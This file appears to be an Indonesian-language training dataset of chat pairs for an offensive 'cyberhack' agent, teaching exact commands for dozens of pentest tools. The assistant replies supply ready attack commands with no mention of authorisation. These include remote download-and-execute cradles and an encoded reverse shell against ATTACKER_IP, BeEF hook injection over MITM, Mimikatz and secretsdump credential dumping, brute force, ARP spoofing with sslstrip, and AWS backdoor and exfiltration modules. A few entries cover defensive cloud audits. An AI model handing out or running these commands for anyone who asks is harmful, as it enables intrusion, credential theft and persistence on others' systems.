"""
NEXUS — Dataset Tools Execution Knowledge
66 entries: satu per tool, ngajarin exact WSL path dan cara eksekusi
Tools ada di: /mnt/e/agent_cyberhack/data/raw_datasets/tool_scripts/CATEGORY/TOOL/
Export: TOOLS_EXEC_DATA
"""

# Base path tools di WSL
BASE = "/mnt/e/agent_cyberhack/data/raw_datasets/tool_scripts"

TOOLS_EXEC_DATA = [

    # ══ RECON ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "pake Sublist3r cari subdomain target.com"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/recon/Sublist3r/sublist3r.py -d target.com -o subs_target.txt\n```\nFlag berguna:\n- `-d` domain target\n- `-o` output file\n- `-t 20` threads\n- `-e google,bing,dnsdumpster` pilih engine\n\nHasilnya disave di `subs_target.txt` bro."}]},

    {"conversations": [{"from": "human", "value": "jalanin theHarvester buat gather emails dan subdomains dari target.com"}, {"from": "gpt", "value": "```bash\ntheHarvester -d target.com -b all -l 500 -f harvest_target.html\n```\nFlag:\n- `-d target.com` domain\n- `-b all` semua sources\n- `-l 500` limit 500 results\n- `-f` output file HTML\n- `-b google,bing,linkedin` kalau mau pilih source tertentu\n\nBuka `harvest_target.html` buat lihat full report bro. theHarvester berjalan sebagai system tool di WSL."}]},

    {"conversations": [{"from": "human", "value": "pake Photon buat crawl website dan extract semua link, email, dan file"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/recon/Photon/photon.py -u https://target.com -o photon_output\n```\nFlag berguna:\n- `-u` URL target\n- `-o` output directory\n- `-l 3` crawl depth\n- `-t 30` threads\n- `--wayback` include wayback machine\n\nOutput di folder `photon_output/`: intel.txt, emails.txt, endpoints.txt, scripts.js bro."}]},

    {"conversations": [{"from": "human", "value": "setup recon-ng dan mulai automated recon buat target"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/recon/recon-ng/recon-ng\n\n# Di dalam recon-ng:\nworkspaces create target_corp\ndb insert domains\n# > target.com\nmarketplace install all\nmodules load recon/domains-hosts/hackertarget\nrun\nmodules load recon/domains-contacts/whois_pocs\nrun\nreporting load reporting/html\nset FILENAME recon_report.html\nrun\n```\nRecon-ng kayak metasploit tapi buat OSINT bro. Workspace keeps semua findings terpisah per target."}]},

    # ══ SCAN ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "jalanin AutoRecon ke target 192.168.1.100 buat comprehensive scan"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/scan/AutoRecon/autorecon.py 192.168.1.100\n\n# Multi target\npython3 {BASE}/scan/AutoRecon/autorecon.py 192.168.1.100 192.168.1.101 192.168.1.102\n\n# Dari file\npython3 {BASE}/scan/AutoRecon/autorecon.py --target-file targets.txt\n```\nAutoRecon jalanin nmap, nikto, gobuster, dan banyak tools lain secara otomatis bro. Output tersave di `results/192.168.1.100/`."}]},

    {"conversations": [{"from": "human", "value": "pake nmapAutomator buat full automated nmap scan"}, {"from": "gpt", "value": f"```bash\nbash {BASE}/scan/nmapAutomator/nmapAutomator.sh 192.168.1.100 All\n\n# Tipe scan:\n# Network  - host discovery\n# Port     - fast port scan\n# Script   - default scripts\n# Full     - full port scan\n# UDP      - UDP scan\n# Vulns    - vuln scan\n# All      - semua di atas\n```\nOutput folder `192.168.1.100/` berisi hasil tiap scan type bro."}]},

    {"conversations": [{"from": "human", "value": "pakai nmap-vulners script buat cek CVE di service yang ketemu"}, {"from": "gpt", "value": f"```bash\n# nmap-vulners adalah NSE script, copy dulu ke nmap scripts dir\ncp {BASE}/scan/nmap-vulners/vulners.nse /usr/share/nmap/scripts/\nnmap --script-updatedb\n\n# Jalankan\nnmap -sV --script vulners 192.168.1.100\nnmap -sV --script vulners -p 80,443,22,21 192.168.1.100\n```\nVulners script query database CVE berdasarkan service version yang ketemu. Hasilnya langsung CVE ID + CVSS score bro."}]},

    {"conversations": [{"from": "human", "value": "jalanin Legion buat GUI-based automated network scan"}, {"from": "gpt", "value": f"```bash\n# Legion butuh display (GUI)\npython3 {BASE}/scan/Legion/legion.py\n\n# Atau kalau ada DISPLAY\nDISPLAY=:0 python3 {BASE}/scan/Legion/legion.py\n\n# Kalau di headless server, pake xvfb\nxvfb-run python3 {BASE}/scan/Legion/legion.py\n```\nLegion GUI: add target → klik scan → auto-run nmap + nikto + berbagai tools. Hasil tampil di panel bro."}]},

    # ══ WEB ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "jalanin sqlmap ke https://target.com/search?q=test buat cari SQL injection"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/web/sqlmap/sqlmap.py -u 'https://target.com/search?q=test' --batch --dbs\n\n# Dump table setelah tau DB\npython3 {BASE}/web/sqlmap/sqlmap.py -u 'https://target.com/search?q=test' --batch -D dbname -T users --dump\n\n# Dari Burp request file\npython3 {BASE}/web/sqlmap/sqlmap.py -r request.txt --batch --level=3 --risk=2 --dbs\n\n# Bypass WAF\npython3 {BASE}/web/sqlmap/sqlmap.py -u 'URL' --tamper=space2comment,between,randomcase --batch --dbs\n```\nShare output pertama bro — gw kasih command lanjutan berdasar DB yang ketemu."}]},

    {"conversations": [{"from": "human", "value": "pake XSStrike buat cari XSS di https://target.com/search?q=test"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/web/XSStrike/xsstrike.py -u 'https://target.com/search?q=test'\n\n# Crawl dan test semua parameter\npython3 {BASE}/web/XSStrike/xsstrike.py -u https://target.com --crawl\n\n# DOM XSS\npython3 {BASE}/web/XSStrike/xsstrike.py -u 'https://target.com/search?q=test' --dom\n\n# Blind XSS\npython3 {BASE}/web/XSStrike/xsstrike.py -u 'https://target.com' --blind\n\n# Fuzzing\npython3 {BASE}/web/XSStrike/xsstrike.py -u 'https://target.com/search?q=test' --fuzzer\n```\nXSStrike lebih smart dari basic XSS scan bro — pake ML buat generate bypass payload."}]},

    {"conversations": [{"from": "human", "value": "pake dirsearch buat brute force directory di target.com"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/web/dirsearch/dirsearch.py -u https://target.com\n\n# Custom extensions\npython3 {BASE}/web/dirsearch/dirsearch.py -u https://target.com -e php,asp,aspx,jsp,html,js,txt,bak\n\n# Custom wordlist\npython3 {BASE}/web/dirsearch/dirsearch.py -u https://target.com -w /usr/share/wordlists/dirb/big.txt\n\n# Output ke file\npython3 {BASE}/web/dirsearch/dirsearch.py -u https://target.com -o dirsearch_output.txt\n\n# Threads\npython3 {BASE}/web/dirsearch/dirsearch.py -u https://target.com -t 50\n```\nShare output bro — gw bantu identifikasi mana yang worth di-explore lebih dalam."}]},

    {"conversations": [{"from": "human", "value": "pakai Arjun buat discover hidden HTTP parameters di endpoint"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/web/Arjun/arjun.py -u https://target.com/api/endpoint\n\n# POST request\npython3 {BASE}/web/Arjun/arjun.py -u https://target.com/api/endpoint -m POST\n\n# JSON body\npython3 {BASE}/web/Arjun/arjun.py -u https://target.com/api -m JSON\n\n# Dari list URLs\npython3 {BASE}/web/Arjun/arjun.py -i urls.txt -m GET\n\n# Dengan headers auth\npython3 {BASE}/web/Arjun/arjun.py -u https://target.com/api -H 'Authorization: Bearer TOKEN'\n```\nArjun detect parameter hidden yang tidak ada di form/URL normal. Parameter kayak `debug`, `admin`, `id`, `role` sering bikin vuln bro."}]},

    {"conversations": [{"from": "human", "value": "mau liat payload SQL injection, XSS, atau LFI dari PayloadsAllTheThings"}, {"from": "gpt", "value": f"```bash\n# PayloadsAllTheThings adalah wordlist/payload collection\n# Browse langsung ke folder\nls {BASE}/web/PayloadsAllTheThings/\n\n# Lihat SQL injection payloads\ncat '{BASE}/web/PayloadsAllTheThings/SQL Injection/README.md'\n\n# XSS payloads\ncat '{BASE}/web/PayloadsAllTheThings/XSS Injection/README.md'\n\n# LFI payloads\ncat '{BASE}/web/PayloadsAllTheThings/File Inclusion/README.md'\n\n# Command injection\ncat '{BASE}/web/PayloadsAllTheThings/Command Injection/README.md'\n\n# SSRF\ncat '{BASE}/web/PayloadsAllTheThings/Server Side Request Forgery/README.md'\n\n# Cari payload spesifik\ngrep -r 'union select' '{BASE}/web/PayloadsAllTheThings/' --include='*.md' -l\n```\nPayloadsAllTheThings = ensiklopedia payload untuk semua jenis attack. Reference wajib bro."}]},

    # ══ EXPLOIT ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "pake impacket buat secretsdump ke domain controller"}, {"from": "gpt", "value": f"```bash\n# secretsdump\npython3 {BASE}/exploit/impacket/examples/secretsdump.py domain/admin:password@192.168.1.100\n\n# Pass-the-hash\npython3 {BASE}/exploit/impacket/examples/secretsdump.py -hashes :NTLM_HASH domain/admin@192.168.1.100\n\n# Just DC\npython3 {BASE}/exploit/impacket/examples/secretsdump.py domain/admin:pass@192.168.1.100 -just-dc\n\n# psexec\npython3 {BASE}/exploit/impacket/examples/psexec.py domain/admin:pass@192.168.1.100\n\n# wmiexec\npython3 {BASE}/exploit/impacket/examples/wmiexec.py domain/admin:pass@192.168.1.100\n\n# GetUserSPNs (Kerberoasting)\npython3 {BASE}/exploit/impacket/examples/GetUserSPNs.py domain/user:pass -dc-ip 192.168.1.100 -request\n```\nImpacket = swiss army knife buat Windows/AD exploitation bro."}]},

    {"conversations": [{"from": "human", "value": "pake pwntools buat solve CTF binary exploitation"}, {"from": "gpt", "value": f"```python\n# Install/import pwntools dari path lokal\nimport sys\nsys.path.insert(0, '{BASE}/exploit/pwntools')\nfrom pwn import *\n\n# Basic buffer overflow\nbinary = './vuln'\nelf = ELF(binary)\ncontext.binary = elf\n\np = process(binary)\n# p = remote('challenge.ctf.com', 1337)\n\n# Find offset dengan cyclic\np.sendline(cyclic(200))\np.wait()\ncore = Coredump('./core')\noffset = cyclic_find(core.rip)\nprint(f'Offset: {{offset}}')\n\n# Build payload\np = process(binary)\npayload = flat(b'A' * offset, p64(elf.sym['win']))\np.sendline(payload)\np.interactive()\n```\nOr install pwntools langsung: `pip3 install pwntools` — lebih reliable dari source bro."}]},

    {"conversations": [{"from": "human", "value": "setup BeEF untuk hook browser target dan jalanin perintah"}, {"from": "gpt", "value": f"```bash\n# Start BeEF\ncd {BASE}/exploit/BeEF\nbash beef\n\n# Default: http://localhost:3000/ui/panel\n# Login: beef/beef\n\n# Embed hook di halaman HTML\n# <script src='http://ATTACKER_IP:3000/hook.js'></script>\n\n# Atau inject via MITM (bettercap)\nbettercap -iface eth0\n> set http.proxy.script beef_inject.js\n> http.proxy on\n\n# beef_inject.js:\n# function onLoad(req, res) {{\n#   res.Body = res.Body.replace('</body>',\n#     '<script src=\"http://ATTACKER_IP:3000/hook.js\"></script></body>');\n# }}\n\n# Setelah hooked, di BeEF UI:\n# Commands > Browser > Get Cookie\n# Commands > Browser > Redirect Browser\n# Commands > Network > Fingerprint Network\n```\nBeEF powerful buat post-XSS exploitation bro. Hook satu victim = execute ratusan browser commands."}]},

    {"conversations": [{"from": "human", "value": "pake Exploit-Suggester buat cari local privilege escalation di target Linux"}, {"from": "gpt", "value": f"```bash\n# Di target, collect uname output\nuname -a\n# Contoh: Linux ubuntu 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64\n\n# Di attacker, jalanin exploit suggester\nbash {BASE}/exploit/Exploit-Suggester/linux-exploit-suggester.sh -u 'Linux ubuntu 5.4.0-74-generic'\n\n# Atau dari file\nbash {BASE}/exploit/Exploit-Suggester/linux-exploit-suggester.sh < uname_output.txt\n\n# Versi 2 (lebih lengkap)\npython3 {BASE}/exploit/Exploit-Suggester/linux-exploit-suggester-2.py -k 5.4.0\n\n# Windows version\npython3 windows-exploit-suggester.py --systeminfo sysinfo.txt --database database.xlsx\n```\nOutput kasih list CVE yang vulnerable berdasar kernel version. High confidence = kemungkinan works bro."}]},

    # ══ POST EXPLOIT ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "jalanin CrackMapExec buat lateral movement di Windows network"}, {"from": "gpt", "value": f"```bash\n# SMB enum\npython3 {BASE}/post_exploit/CrackMapExec/crackmapexec smb 192.168.1.0/24\n\n# Auth test\npython3 {BASE}/post_exploit/CrackMapExec/crackmapexec smb 192.168.1.0/24 -u admin -p Password123\n\n# Pass-the-hash\npython3 {BASE}/post_exploit/CrackMapExec/crackmapexec smb 192.168.1.0/24 -u admin -H NTLM_HASH\n\n# Execute command\npython3 {BASE}/post_exploit/CrackMapExec/crackmapexec smb 192.168.1.100 -u admin -p pass -x 'whoami'\n\n# Dump SAM\npython3 {BASE}/post_exploit/CrackMapExec/crackmapexec smb 192.168.1.100 -u admin -p pass --sam\n\n# WinRM\npython3 {BASE}/post_exploit/CrackMapExec/crackmapexec winrm 192.168.1.100 -u admin -p pass\n```\nCME the most versatile post-exploit tool buat Windows networks bro."}]},

    {"conversations": [{"from": "human", "value": "upload dan jalanin LinPEAS di Linux target yang udah di-compromise"}, {"from": "gpt", "value": f"```bash\n# LinPEAS ada di WSL path ini\n# Di attacker machine:\nls {BASE}/post_exploit/LinPEAS/\n\n# Method 1: Serve via HTTP dari attacker\ncd {BASE}/post_exploit/LinPEAS\npython3 -m http.server 8888\n\n# Di target:\ncurl http://ATTACKER_IP:8888/linpeas.sh | bash\n\n# Method 2: Upload via SCP kalau ada SSH\nscp {BASE}/post_exploit/LinPEAS/linpeas.sh user@target:/tmp/\nssh user@target 'bash /tmp/linpeas.sh'\n\n# Method 3: Via meterpreter\nupload {BASE}/post_exploit/LinPEAS/linpeas.sh /tmp/linpeas.sh\nshell\nbash /tmp/linpeas.sh 2>/dev/null\n```\nLinPEAS output banyak, filter yang penting:\n```bash\nlinpeas.sh 2>/dev/null | grep -E 'CVE|SUID|sudo|password' | head -50\n```"}]},

    {"conversations": [{"from": "human", "value": "pake BloodHound collect Active Directory data buat analisis attack path"}, {"from": "gpt", "value": f"```bash\n# bloodhound-python collector\npython3 {BASE}/post_exploit/BloodHound/setup.py develop 2>/dev/null\nbloodhound-python -d domain.local -u john -p Password123 -c All -ns 192.168.1.100 -o bloodhound_data/\n\n# Atau pake impacket bloodhound collector yang lebih fresh\npip install bloodhound\nbloodhound-python -d domain.local -u john -p pass -c All --zip\n\n# Start BloodHound UI\ncd {BASE}/post_exploit/BloodHound\nnpm install && npm start\n\n# atau via docker\ndocker run -p 7474:7474 -p 7687:7687 specterops/bloodhound-oss\n\n# Import data ke BloodHound UI\n# Upload zip file dari collector output\n# Query: Find Shortest Paths to Domain Admin\n```\nBloodHound visual semua attack path ke Domain Admin. Paling berguna untuk AD pentest bro."}]},

    {"conversations": [{"from": "human", "value": "pake PowerSploit untuk post-exploitation di Windows target"}, {"from": "gpt", "value": f"```powershell\n# PowerSploit ada di WSL, serve ke Windows target\n# Di attacker:\npython3 -m http.server 8888 --directory {BASE}/post_exploit/PowerSploit/\n\n# Di Windows target:\n# Privilege escalation\nIEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8888/Privesc/PowerUp.ps1')\nInvoke-AllChecks\n\n# Recon\nIEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8888/Recon/PowerView.ps1')\nGet-NetDomain\nGet-NetUser | Select-Object samaccountname\nGet-NetGroupMember 'Domain Admins'\n\n# Persistence\nIEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8888/Persistence/Persistence.psm1')\nAdd-Persistence -ScriptBlock {{ whoami }} -ElevatedPersistenceOption ScheduledTask -UserPersistenceOption ScheduledTask\n\n# Lateral movement\nIEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8888/Lateral Movement/Invoke-Mimikatz.ps1')\nInvoke-Mimikatz -DumpCreds\n```"}]},

    {"conversations": [{"from": "human", "value": "cara pake nishang untuk PowerShell reverse shell"}, {"from": "gpt", "value": f"```powershell\n# Serve nishang dari WSL\npython3 -m http.server 8888 --directory {BASE}/post_exploit/nishang/\n\n# Di target Windows, download dan execute:\n# TCP reverse shell\nIEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8888/Shells/Invoke-PowerShellTcp.ps1')\nInvoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port 4444\n\n# UDP reverse shell\nIEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8888/Shells/Invoke-PowerShellUdp.ps1')\nInvoke-PowerShellUdp -Reverse -IPAddress ATTACKER_IP -Port 4444\n\n# Di attacker - setup listener dulu\nnc -nlvp 4444\n\n# One-liner encoded (bypass execution policy)\n$command = \"IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8888/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port 4444\"\n$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))\npowershell -ep bypass -enc $encoded\n```\nNishang = koleksi PowerShell tools untuk offensive security bro."}]},

    {"conversations": [{"from": "human", "value": "pake SharpCollection buat post-exploitation di Windows"}, {"from": "gpt", "value": f"```bash\n# SharpCollection = compiled C# security tools\nls {BASE}/post_exploit/SharpCollection/NetFramework_4.7_Any/\n# Berisi: Rubeus, SharpHound, SharpView, Certify, dll\n\n# Serve dari WSL\npython3 -m http.server 8888 --directory {BASE}/post_exploit/SharpCollection/\n\n# Di target Windows - download dan run:\n# Rubeus (Kerberos attacks)\nIEX(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP:8888/NetFramework_4.7_Any/Rubeus.exe', 'C:\\\\Temp\\\\Rubeus.exe')\nC:\\Temp\\Rubeus.exe kerberoast /outfile:hashes.txt /nowrap\nC:\\Temp\\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt /nowrap\n\n# SharpHound\nIEX(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP:8888/NetFramework_4.7_Any/SharpHound.exe', 'C:\\\\Temp\\\\SharpHound.exe')\nC:\\Temp\\SharpHound.exe -c All --zipfilename bloodhound.zip\n\n# Certify (AD CS attacks)\nC:\\Temp\\Certify.exe find /vulnerable\n```"}]},

    # ══ BRUTE FORCE ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "pake patator buat brute force SSH"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/brute_force/patator/patator.py ssh_login \\\n  host=192.168.1.100 \\\n  user=root \\\n  password=FILE0 \\\n  0=/usr/share/wordlists/rockyou.txt \\\n  -x ignore:mesg='Authentication failed'\n\n# Multi username\npython3 {BASE}/brute_force/patator/patator.py ssh_login \\\n  host=192.168.1.100 \\\n  user=FILE0 password=FILE1 \\\n  0=users.txt 1=/usr/share/wordlists/rockyou.txt \\\n  -x ignore:mesg='failed'\n\n# HTTP form brute\npython3 {BASE}/brute_force/patator/patator.py http_fuzz \\\n  url=https://target.com/login method=POST \\\n  body='user=admin&pass=FILE0' \\\n  0=rockyou.txt \\\n  -x ignore:fgrep='Invalid'\n```\nPatator lebih flexible dari hydra, bisa handle edge cases bro."}]},

    {"conversations": [{"from": "human", "value": "pake crowbar buat brute force RDP"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/brute_force/crowbar/crowbar.py \\\n  -b rdp \\\n  -s 192.168.1.100/32 \\\n  -u administrator \\\n  -C /usr/share/wordlists/rockyou.txt\n\n# Multi target\npython3 {BASE}/brute_force/crowbar/crowbar.py \\\n  -b rdp \\\n  -S targets.txt \\\n  -U users.txt \\\n  -C passwords.txt\n\n# SSH dengan keyfile\npython3 {BASE}/brute_force/crowbar/crowbar.py \\\n  -b sshkey \\\n  -s 192.168.1.100/32 \\\n  -u root \\\n  -k /root/.ssh/\n\n# VNC\npython3 {BASE}/brute_force/crowbar/crowbar.py \\\n  -b vnc \\\n  -s 192.168.1.100/32 \\\n  -C passwords.txt\n```\nCrowbar specialized buat RDP/VNC/SSH brute bro. Lebih reliable dari hydra untuk protokol ini."}]},

    {"conversations": [{"from": "human", "value": "pake Medusa buat brute force FTP"}, {"from": "gpt", "value": f"```bash\nmedusa \\\n  -h 192.168.1.100 \\\n  -u admin \\\n  -P /usr/share/wordlists/rockyou.txt \\\n  -M ftp \\\n  -t 10\n\n# SSH\nmedusa -h 192.168.1.100 -u root -P rockyou.txt -M ssh -t 5\n\n# HTTP\nmedusa -h target.com -u admin -P rockyou.txt -M http -m DIR:/login\n\n# Multi target dari file\nmedusa -H hosts.txt -u admin -P rockyou.txt -M ssh\n```\nMedusa parallel, cepet buat multi-host bro. Kalau Medusa.py gak jalan, install system Medusa: `apt install medusa`."}]},

    {"conversations": [{"from": "human", "value": "pake BruteX buat automated all-service brute force"}, {"from": "gpt", "value": f"```bash\nbash {BASE}/brute_force/BruteX/brutex 192.168.1.100\n\n# BruteX otomatis:\n# 1. Nmap scan semua ports\n# 2. Detect services (SSH, FTP, HTTP, Telnet, SMTP, MySQL, dll)\n# 3. Brute force semua service yang ditemukan\n# 4. Simpan hasil di loot/\n\n# Custom port\nbash {BASE}/brute_force/BruteX/brutex 192.168.1.100 22\n\n# Lihat wordlists yang dipakai\nls {BASE}/brute_force/BruteX/wordlists/\n\n# Hasil tersave di:\ncat {BASE}/brute_force/BruteX/loot/192.168.1.100_*\n```\nBruteX = fire and forget bro. Tinggal kasih IP, dia urus sisanya."}]},

    # ══ WIRELESS ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "jalanin wifite2 buat automated WiFi attack"}, {"from": "gpt", "value": f"```bash\n# Jalanin wifite2\nsudo python3 {BASE}/wireless/wifite2/wifite.py\n\n# WPA attack dengan wordlist\nsudo python3 {BASE}/wireless/wifite2/wifite.py --wpa --dict /usr/share/wordlists/rockyou.txt\n\n# WPS attack\nsudo python3 {BASE}/wireless/wifite2/wifite.py --wps\n\n# PMKID attack (no client needed)\nsudo python3 {BASE}/wireless/wifite2/wifite.py --pmkid\n\n# Target BSSID spesifik\nsudo python3 {BASE}/wireless/wifite2/wifite.py --bssid AA:BB:CC:DD:EE:FF --wpa\n\n# Interface spesifik\nsudo python3 {BASE}/wireless/wifite2/wifite.py -i wlan0 --wpa\n```\nWifite2 handle: monitor mode, capture, deauth, dan crack otomatis. Paling gampang buat WiFi testing bro."}]},

    {"conversations": [{"from": "human", "value": "setup bettercap buat WiFi MITM dan credential sniffing"}, {"from": "gpt", "value": f"```bash\n# Start bettercap\nsudo {BASE}/wireless/bettercap/bettercap -iface wlan0\n\n# Atau dengan caplet\nsudo {BASE}/wireless/bettercap/bettercap -iface wlan0 -caplet {BASE}/wireless/bettercap/caplets/pwnagotchi-auto.cap\n\n# Interactive commands:\n# wifi.recon on              - scan WiFi networks\n# wifi.show                  - show discovered networks\n# set arp.spoof.targets IP   - set victim\n# arp.spoof on               - start ARP poison\n# set http.proxy.sslstrip true\n# http.proxy on              - HTTP proxy + sslstrip\n# net.sniff on               - start sniffing\n\n# One-liner buat quick MITM\nsudo {BASE}/wireless/bettercap/bettercap -iface wlan0 -eval 'net.probe on; set arp.spoof.targets 192.168.1.50; arp.spoof on; net.sniff on'\n```\nBettercap = all-in-one network attack platform bro. WiFi + ARP + HTTP proxy + credential sniff sekaligus."}]},

    {"conversations": [{"from": "human", "value": "pake hcxtools untuk convert pcap ke hashcat format buat crack WPA"}, {"from": "gpt", "value": f"```bash\n# Convert pcap ke hc22000 format\npython3 {BASE}/wireless/hcxtools/hcxpcapngtool capture.pcapng -o hash.hc22000\n\n# Atau binary langsung\n{BASE}/wireless/hcxtools/hcxpcapngtool capture.pcapng -o hash.hc22000\n\n# Kalau binary belum compile:\ncd {BASE}/wireless/hcxtools && make\n./hcxpcapngtool capture.pcapng -o hash.hc22000\n\n# Setelah convert, crack dengan hashcat\nhashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt -O\n\n# Dengan rules\nhashcat -m 22000 hash.hc22000 rockyou.txt -r /usr/share/hashcat/rules/best64.rule\n\n# Atau upload ke wpa-sec.stanev.org\ncurl -X POST -F 'eapfile=@hash.hc22000' https://wpa-sec.stanev.org/?submit\n```\nHcxtools = convert + filter pcap untuk WiFi cracking. Lebih akurat dari aircrack format bro."}]},

    {"conversations": [{"from": "human", "value": "setup Pwnagotchi untuk automated passive WiFi handshake collection"}, {"from": "gpt", "value": f"```bash\n# Pwnagotchi installation\npip3 install pwnagotchi\n\n# Atau dari source\ncd {BASE}/wireless/Pwnagotchi\npip3 install -r requirements.txt\n\n# Start manual mode (laptop)\nsudo python3 {BASE}/wireless/Pwnagotchi/pwnagotchi --manual\n\n# Config file: /etc/pwnagotchi/config.toml\ncat > /etc/pwnagotchi/config.toml << 'EOF'\nmain.name = \"nexus\"\nmain.lang = \"en\"\nmain.whitelist = []\nui.display.enabled = true\nEOF\n\n# Start auto mode\nsudo python3 {BASE}/wireless/Pwnagotchi/pwnagotchi\n\n# Web UI\n# http://10.0.0.2:8080\n# Default creds: changeme\n\n# Handshakes disave di /root/handshakes/\nhashcat -m 22000 /root/handshakes/*.pcap rockyou.txt\n```\nPwnagotchi AI passive mode — jalan-jalan sambil laptop nyala = collect handshake otomatis bro."}]},

    # ══ CLOUD ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "pake Pacu buat AWS post-exploitation"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/cloud/Pacu/cli.py\n\n# Di Pacu shell:\nimport_keys default  # import dari ~/.aws/credentials\n\n# Enumerate\nrun iam__enum_permissions\nrun iam__enum_users_roles_policies_groups\nrun ec2__enum\nrun s3__enum\nrun lambda__enum\n\n# Privilege escalation\nrun iam__privesc_scan\n\n# Data exfiltration\nrun s3__download_bucket\n\n# Persistence\nrun iam__backdoor_users_keys\n\n# Whoami\nwhoami\n\n# Exit\nexit\n```\nPacu = metasploit untuk AWS bro. 100+ modules untuk semua aspek AWS post-exploitation."}]},

    {"conversations": [{"from": "human", "value": "jalanin ScoutSuite buat comprehensive cloud security audit"}, {"from": "gpt", "value": f"```bash\n# AWS audit\npython3 {BASE}/cloud/ScoutSuite/scout.py aws\n\n# Azure\npython3 {BASE}/cloud/ScoutSuite/scout.py azure --cli\n\n# GCP\npython3 {BASE}/cloud/ScoutSuite/scout.py gcp --user-account\n\n# Dengan profile spesifik\npython3 {BASE}/cloud/ScoutSuite/scout.py aws --profile pentest-account\n\n# Report output\npython3 {BASE}/cloud/ScoutSuite/scout.py aws --report-dir ./scout_report\n\n# Buka report\ncd scout_report && python3 -m http.server 8080\n# Akses http://localhost:8080\n\n# Filter hasil\npython3 {BASE}/cloud/ScoutSuite/scout.py aws 2>&1 | grep -E 'danger|warning' | head -30\n```\nScoutSuite check 300+ security rules sekaligus bro. Multi-cloud support."}]},

    {"conversations": [{"from": "human", "value": "pake Prowler buat AWS CIS Benchmark compliance check"}, {"from": "gpt", "value": f"```bash\n# CIS Level 1\npython3 {BASE}/cloud/Prowler/prowler-cli.py aws -g cislevel1\n\n# CIS Level 2\npython3 {BASE}/cloud/Prowler/prowler-cli.py aws -g cislevel2\n\n# GDPR\npython3 {BASE}/cloud/Prowler/prowler-cli.py aws -g gdpr\n\n# Output ke CSV + HTML\npython3 {BASE}/cloud/Prowler/prowler-cli.py aws -M csv,html\n\n# Specific service\npython3 {BASE}/cloud/Prowler/prowler-cli.py aws -s s3\npython3 {BASE}/cloud/Prowler/prowler-cli.py aws -s iam\n\n# Semua findings FAIL saja\npython3 {BASE}/cloud/Prowler/prowler-cli.py aws | grep 'FAIL'\n\n# Assume role\npython3 {BASE}/cloud/Prowler/prowler-cli.py aws --role arn:aws:iam::ACCOUNT:role/SecurityAudit\n```\nProwler = quick compliance check sebelum audit resmi bro. FAIL findings = yang harus di-fix."}]},

    {"conversations": [{"from": "human", "value": "pake CloudSploit buat cloud security scanning"}, {"from": "gpt", "value": f"```bash\n# CloudSploit setup\ncd {BASE}/cloud/CloudSploit\nnpm install\n\n# Configure credentials\ncp config_example.js config.js\n# Edit config.js: masukkan AWS/Azure/GCP credentials\n\n# Run scan\nnode {BASE}/cloud/CloudSploit/index.js --cloud aws\nnode {BASE}/cloud/CloudSploit/index.js --cloud azure\nnode {BASE}/cloud/CloudSploit/index.js --cloud gcp\n\n# Output JSON\nnode {BASE}/cloud/CloudSploit/index.js --cloud aws --json > results.json\n\n# Filter critical\ncat results.json | python3 -c \"\nimport json,sys\nfor r in json.load(sys.stdin):\n    if r.get('status') == 'FAIL' and r.get('severity') in ['critical','high']:\n        print(r['title'], '-', r['message'])\n\"\n```\nCloudsploit check misconfigurations di S3, IAM, Security Groups, dll bro."}]},

    {"conversations": [{"from": "human", "value": "pake SkyArk buat discover privileged Azure AD users"}, {"from": "gpt", "value": f"```powershell\n# SkyArk - Azure privilege discovery\n# Di Windows atau WSL dengan PowerShell\n\n# Import module\nImport-Module {BASE}/cloud/SkyArk/SkyArk.ps1\n\n# Atau dari WSL\npwsh {BASE}/cloud/SkyArk/SkyArk.ps1\n\n# Commands:\n# Collect Azure AD data\nGet-AzureADUsersPrivileges\n\n# Find privileged users\nInvoke-AzureADPrivilegedUsersHunting\n\n# Hunting admin accounts\nGet-AzureADGuestUsers\nGet-AzureADServicePrincipals\n\n# Auth dulu\nConnect-AzureAD\n# atau\naz login\n\n# Alternative: PowerZure\ngit clone https://github.com/hausec/PowerZure\nImport-Module ./PowerZure/PowerZure.ps1\nGet-AzureTargets\n```\nSkyArk = discover siapa saja yang punya privilege di Azure AD bro."}]},

    # ══ CRYPTO ══════════════════════════════════════════════

